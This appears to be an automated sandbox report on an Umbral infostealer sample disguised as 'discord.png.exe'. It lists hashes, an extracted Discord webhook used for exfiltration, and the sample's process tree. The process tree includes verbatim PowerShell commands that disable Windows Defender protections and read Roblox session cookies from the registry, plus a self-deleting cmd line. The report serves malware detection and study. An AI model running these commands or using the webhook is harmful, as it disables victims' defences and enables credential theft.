Analysis
max time kernel: 45s
max time network: 25s
platform: windows10-1703_x64
resource: win10-20240611-en
resource tags: arch:x64, arch:x86, image:win10-20240611-en, locale:en-us, os:windows10-1703-x64, system
submitted: 02/09/2024, 16:41
Static task: static1
General
Target: discord.png.exe
Size: 225KB
MD5: 44041b93332122228c15d8fd2fdc826d
SHA1: 47069ad7151444f7412036952272405000d0e3f9
SHA256: 9c71bd0581840574d1ea5919284bbb89e6e19f883bf8ffc4b50c03aea223067e
SHA512: e109c3d7fbd6fc892ae28fe66092dcf5723de577eefb6a363cd571e422b7ce23e54b4f2ba1988b792f7abc8cac83981b1311f16b2a8c7f95081d654c03ce1f7f
SSDEEP: 3072:WeEDoF+/dwv+J5evFqmHNNhmqOOR81MK1vHM/2M:WoFzvGeNqcNNs9L1vHM/
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1279958073611653151/sgCCzoTAUY2GdBiQCHyal38EkTL7KHY4qK_JXgYBYU5QznfI7jIvFFaW3IHI9Y8dsDm8
Signatures

Detect Umbral payload (2 IoCs)
  resource                                                                      yara_rule
  behavioral1/files/0x000800000001aac3-6.dat                                    family_umbral
  behavioral1/memory/1716-8-0x0000026E67020000-0x0000026E6707A000-memory.dmp    family_umbral

Credentials from Password Stores: Credentials from Web Browsers (1 TTPs)
  Malicious Access or copy of Web Browser Credential store.

Command and Scripting Interpreter: PowerShell (1 TTPs, 4 IoCs)
  Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  pid   Process
  1620  powershell.exe
  2292  powershell.exe
  4708  powershell.exe
  3276  powershell.exe

Drops file in Drivers directory (1 IoCs)
  description                   ioc                                    Process
  File opened for modification  C:\Windows\System32\drivers\etc\hosts  discord.exe

Executes dropped EXE (1 IoCs)
  pid   Process
  1716  discord.exe
Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
  flow  ioc
  12    discord.com
  11    discord.com

Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  5     ip-api.com

Drops file in Windows directory (2 IoCs)
  description   ioc                                                    Process
  File created  C:\Windows\rescache\_merged\4183903823\2290032291.pri  taskmgr.exe
  File created  C:\Windows\rescache\_merged\1601268389\715946058.pri   taskmgr.exe

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

System Network Configuration Discovery: Internet Connection Discovery (1 TTPs, 2 IoCs)
  Adversaries may check for Internet connectivity on compromised systems.
  pid   Process
  3660  PING.EXE
  468   cmd.exe
Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  description        ioc                                                                                                                                                 Process
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000                                                  taskmgr.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A  taskmgr.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName                                     taskmgr.exe

Detects videocard installed (1 TTPs, 1 IoCs)
  Uses WMIC.exe to determine videocard installed.
  pid   Process
  2304  wmic.exe

Runs ping.exe (1 TTPs, 1 IoCs)
  pid   Process
  3660  PING.EXE
Suspicious behavior: EnumeratesProcesses (63 IoCs)
  pid   Process
  1716  discord.exe
  1620  powershell.exe  (3 entries)
  2292  powershell.exe  (3 entries)
  4708  powershell.exe  (3 entries)
  3108  powershell.exe  (3 entries)
  4824  taskmgr.exe     (3 entries)
  3276  powershell.exe  (2 entries)
  4824  taskmgr.exe     (2 entries)
  3276  powershell.exe  (1 entry)
  4824  taskmgr.exe     (all remaining entries)

Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  pid   Process
  4824  taskmgr.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Token                          pid   Process
  SeDebugPrivilege               1716  discord.exe
  SeIncreaseQuotaPrivilege       4428  wmic.exe
  SeSecurityPrivilege            4428  wmic.exe
  SeTakeOwnershipPrivilege       4428  wmic.exe
  SeLoadDriverPrivilege          4428  wmic.exe
  SeSystemProfilePrivilege       4428  wmic.exe
  SeSystemtimePrivilege          4428  wmic.exe
  SeProfSingleProcessPrivilege   4428  wmic.exe
  SeIncBasePriorityPrivilege     4428  wmic.exe
  SeCreatePagefilePrivilege      4428  wmic.exe
  SeBackupPrivilege              4428  wmic.exe
  SeRestorePrivilege             4428  wmic.exe
  SeShutdownPrivilege            4428  wmic.exe
  SeDebugPrivilege               4428  wmic.exe
  SeSystemEnvironmentPrivilege   4428  wmic.exe
  SeRemoteShutdownPrivilege      4428  wmic.exe
  SeUndockPrivilege              4428  wmic.exe
  SeManageVolumePrivilege        4428  wmic.exe
  33                             4428  wmic.exe
  34                             4428  wmic.exe
  35                             4428  wmic.exe
  36                             4428  wmic.exe
  (the 21 wmic.exe entries above are listed a second time in the same order)
  SeDebugPrivilege               1620  powershell.exe
  SeIncreaseQuotaPrivilege       1620  powershell.exe
  SeSecurityPrivilege            1620  powershell.exe
  SeTakeOwnershipPrivilege       1620  powershell.exe
  SeLoadDriverPrivilege          1620  powershell.exe
  SeSystemProfilePrivilege       1620  powershell.exe
  SeSystemtimePrivilege          1620  powershell.exe
  SeProfSingleProcessPrivilege   1620  powershell.exe
  SeIncBasePriorityPrivilege     1620  powershell.exe
  SeCreatePagefilePrivilege      1620  powershell.exe
  SeBackupPrivilege              1620  powershell.exe
  SeRestorePrivilege             1620  powershell.exe
  SeShutdownPrivilege            1620  powershell.exe
  SeDebugPrivilege               1620  powershell.exe
  SeSystemEnvironmentPrivilege   1620  powershell.exe
  SeRemoteShutdownPrivilege      1620  powershell.exe
  SeUndockPrivilege              1620  powershell.exe
  SeManageVolumePrivilege        1620  powershell.exe
  33                             1620  powershell.exe
  34                             1620  powershell.exe
  35                             1620  powershell.exe
Suspicious use of FindShellTrayWindow (58 IoCs)
  pid   Process
  4824  taskmgr.exe  (58 entries)

Suspicious use of SendNotifyMessage (58 IoCs)
  pid   Process
  4824  taskmgr.exe  (58 entries)
Suspicious use of WriteProcessMemory (28 IoCs)
  description                       pid   Process          procid_target
  PID 2980 wrote to memory of 1716  2980  discord.png.exe  70
  PID 1716 wrote to memory of 4428  1716  discord.exe      72
  PID 1716 wrote to memory of 256   1716  discord.exe      75
  PID 1716 wrote to memory of 1620  1716  discord.exe      77
  PID 1716 wrote to memory of 2292  1716  discord.exe      80
  PID 1716 wrote to memory of 4708  1716  discord.exe      82
  PID 1716 wrote to memory of 3108  1716  discord.exe      84
  PID 1716 wrote to memory of 1584  1716  discord.exe      87
  PID 1716 wrote to memory of 3524  1716  discord.exe      89
  PID 1716 wrote to memory of 2192  1716  discord.exe      91
  PID 1716 wrote to memory of 3276  1716  discord.exe      93
  PID 1716 wrote to memory of 2304  1716  discord.exe      95
  PID 1716 wrote to memory of 468   1716  discord.exe      97
  PID 468 wrote to memory of 3660   468   cmd.exe          99
  (each of the 14 entries above is listed twice in the report)

Views/modifies file attributes (1 TTPs, 1 IoCs)
  pid   Process
  256   attrib.exe
Processes

[1] C:\Users\Admin\AppData\Local\Temp\discord.png.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\discord.png.exe"
    PID: 2980
    - Suspicious use of WriteProcessMemory

    [2] C:\Users\Admin\AppData\Local\Temp\discord.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\discord.exe"
        PID: 1716
        - Drops file in Drivers directory
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\System32\Wbem\wmic.exe
            cmdline: "wmic.exe" csproduct get uuid
            PID: 4428
            - Suspicious use of AdjustPrivilegeToken

        [3] C:\Windows\SYSTEM32\attrib.exe
            cmdline: "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\discord.exe"
            PID: 256
            - Views/modifies file attributes

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\discord.exe'
            PID: 1620
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
            PID: 2292
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            PID: 4708
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            PID: 3108
            - Suspicious behavior: EnumeratesProcesses

        [3] C:\Windows\System32\Wbem\wmic.exe
            cmdline: "wmic.exe" os get Caption
            PID: 1584

        [3] C:\Windows\System32\Wbem\wmic.exe
            cmdline: "wmic.exe" computersystem get totalphysicalmemory
            PID: 3524

        [3] C:\Windows\System32\Wbem\wmic.exe
            cmdline: "wmic.exe" csproduct get uuid
            PID: 2192

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            PID: 3276
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses

        [3] C:\Windows\System32\Wbem\wmic.exe
            cmdline: "wmic" path win32_VideoController get name
            PID: 2304
            - Detects videocard installed

        [3] C:\Windows\SYSTEM32\cmd.exe
            cmdline: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\discord.exe" && pause
            PID: 468
            - System Network Configuration Discovery: Internet Connection Discovery
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\system32\PING.EXE
                cmdline: ping localhost
                PID: 3660
                - System Network Configuration Discovery: Internet Connection Discovery
                - Runs ping.exe

[1] C:\Windows\system32\taskmgr.exe
    cmdline: "C:\Windows\system32\taskmgr.exe" /4
    PID: 4824
    - Drops file in Windows directory
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Enterprise v15
Credential Access
  Credentials from Password Stores (1)
  Credentials from Web Browsers (1)
  Unsecured Credentials (1)
  Credentials In Files (1)
Downloads

Filesize: 3KB
MD5: 8592ba100a78835a6b94d5949e13dfc1
SHA1: 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256: fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512: 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Filesize: 1KB
MD5: 9fd27146f57e9b13f4d16dfe0c66a4c5
SHA1: 214e2900f8e5176f6a3eade3327f8c160b73f0ff
SHA256: ef59b0a80606e7b5efdca1f5eb4d0203f223e4c8183ccb225f0090edeabd744f
SHA512: d7d0e80c63f31545ad475f6554328883845bc9019e349527f32ae48cdb9df96db453093544962011fcfd37274b48d0a9afdc5ecb98e8e4142af5de642b764fc9

Filesize: 1KB
MD5: b353f933f0657ccbfe7b8fa8312c1907
SHA1: 79e99d89a16ba75c3ec9c337674202c01c4b9601
SHA256: 65efc9322bc38e81d1caf63920772dda4ffb47601080ea663a79cc00cd1fcd7a
SHA512: efa0199192d9ab88f4548c5b2b4058fffbaf0c3954153473fde91de5fd586eae6747031b7c2e96ed774800d9707dcc119c4ecfaadbc3d2ca051d94bebb61d5a6

Filesize: 1KB
MD5: ba9afe039f00b851008f0e104d69984e
SHA1: f8451e0af36c74c144ff69a96d9629bb9a01d793
SHA256: ca5a5d604457a5049906b7e4dc7af652f1a2450f0865bcd1f127aacf731f4338
SHA512: 0836dd8c2834ff74c048060e5f085471641a1d3a12a22a00e84ef1d2d329f30a96998082da040be0e5973c143593b55e4c7702eef60b181402d2547cbe47e025

Filesize: 1KB
MD5: c30d5ded414d1f15b0938f03ded7c51d
SHA1: e71191b4f29dabefb32b7d770976e636810d6110
SHA256: 0c8fe612cb8cfb8fd9d51904f498e06e2cbdb02f963227f8530419d85d6acf37
SHA512: 2e8a01b3ba2f78d8ee2c90add119b180ae7736f26d46930b6af549c70fc460431fbb6dfd276e1193283fc01cedae61ad913465f99adf18db8a9ee7bbc24c5c58

Filesize: 1B
MD5: c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Filesize: 334KB
MD5: d30f272184cafaf82c7170416d4665f9
SHA1: 2aba82b1ce7a24f1c4c26dddb20c1fb63c3ab700
SHA256: 4435fc2a11ae17031e1c52a0b8945701ff35d550413cdc20b528d68a0f20dc32
SHA512: 8d3e11467c74ea04863dd3477878356a359439409b31dd9afc55ae7cd156960797efe0510019f2ac8d73446e60b92deafc56e03b268c1c655bb5469fb374957a